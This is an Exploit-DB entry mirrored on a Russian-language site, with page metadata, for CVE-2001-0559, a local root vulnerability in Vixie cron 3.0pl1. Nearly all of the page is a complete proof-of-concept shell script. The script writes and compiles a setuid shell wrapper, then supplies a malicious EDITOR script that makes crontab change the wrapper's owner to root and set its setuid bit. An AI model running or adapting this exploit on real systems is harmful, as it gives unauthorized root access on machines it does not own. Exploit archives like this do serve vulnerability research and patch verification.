- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 20823
- Проверка EDB
-
- Пройдено
- Автор
- CAIRNSC
- Тип уязвимости
- LOCAL
- Платформа
- LINUX
- CVE
- cve-2001-0559
- Дата публикации
- 2001-07-05
Код:
source: https://www.securityfocus.com/bid/2687/info
Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times.
When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations.
This vulnerability may be exploited to gain root privileges locally.
#!/bin/sh
#
# cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1
#
# synopsis:
# the crontab file maintenance program (crontab) fails to drop privileges
# before invoking the editor under certain circumstances.
#
# description:
# a serialization error exists in some versions of the file maintenance
# program, crontab. the vulnerability was introduced in versions which
# were patched for seperate vulnerability in fall of 2000 (see Bugtraq
# ID #1960).
#
# when a parsing error occurs after a modification operation, crontab will
# fail to drop privileges correctly for subsequent modification operations.
# because the program is installed setuid root, it may be possible for a
# local user to gain root privileges.
#
# affected versions:
# cron_3.0pl1-57.2 distributed with Debian Linux 2.2.
#
# note that copies of the program with the patch mentioned above are likely
# to also be vulnerable.
#
# references:
# https://www.securityfocus.com/bid/2687
#
# 05/07/01 [email protected]
CRONTAB=/usr/bin/crontab
if ! test -x $CRONTAB; then
echo "** unable to locate crontab executable, exiting"
exit 1
fi
cat > vcsh.c << EOF
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/sh", "sh", NULL);
}
EOF
echo "** compiling shell wrapper as $PWD/vcsh"
cc -o $PWD/vcsh $PWD/vcsh.c
if ! test -x $PWD/vcsh; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** creating simple exploit script as $PWD/vcex.sh"
cat > vcex.sh << EOF
#!/bin/sh
sleep 1 && echo "foo" >> \$1
if test -f $PWD/vcboom; then
chown root.root $PWD/vcsh
chmod 4755 $PWD/vcsh
rm $PWD/vcboom
else
touch $PWD/vcboom
fi
EOF
chmod 0755 $PWD/vcex.sh
echo "** running $CRONTAB -e"
echo "**"
echo "** enter 'yes' at the first prompt, then enter 'no' at the second"
echo
(EDITOR=$PWD/vcex.sh $CRONTAB -e)
echo
echo "** done, the shell wrapper should be suid root"
exit 0- Источник
- www.exploit-db.com
